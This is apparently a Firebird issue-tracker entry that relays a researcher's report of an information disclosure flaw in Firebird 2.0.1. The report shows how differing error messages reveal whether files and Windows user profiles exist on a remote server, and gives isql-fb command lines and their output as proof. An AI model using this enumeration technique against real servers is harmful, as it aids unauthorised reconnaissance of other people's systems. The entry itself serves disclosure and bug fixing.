Description
Submitted by: @AlexPeshkoff
Is related to QA132
Bug was reported by David Calligaris <mailto:david.calligaris@emaze.net>:
------------------
There is an information disclosure vulnerability in the Firebird 2.0.1
protocol implementation that could allow a remote attacker to check if a
file is present in the remote system. Successfully exploitation of this
vulnerability allows the remote attacker to launch further attacks on
the remote host.
Proof Of Concept:
-----------------
Example of Windows User Enumeration:
<EXAMPLE>
diaul@yeshu:~$ isql-fb "192.168.1.75:C:\Documents and Settings\diaul"
Statement failed, SQLCODE = -902
I/O error for file "C:\Documents and Settings\diaul"
-Error while trying to open file
-Access is denied.
Use CONNECT or CREATE DATABASE to specify a database
SQL>
diaul@yeshu:~$ isql-fb "192.168.1.75:C:\Documents and Settings\FooBar"
Statement failed, SQLCODE = -902
I/O error for file "C:\Documents and Settings\FooBar"
-Error while trying to open file
-The system cannot find the file specified.
Use CONNECT or CREATE DATABASE to specify a database
SQL>
</EXAMPLE>
You can see there are two different error messages for valid and invalid
resources.
------------------
The reason of a bug is that password validation is done almost in the end of database attach/create calls.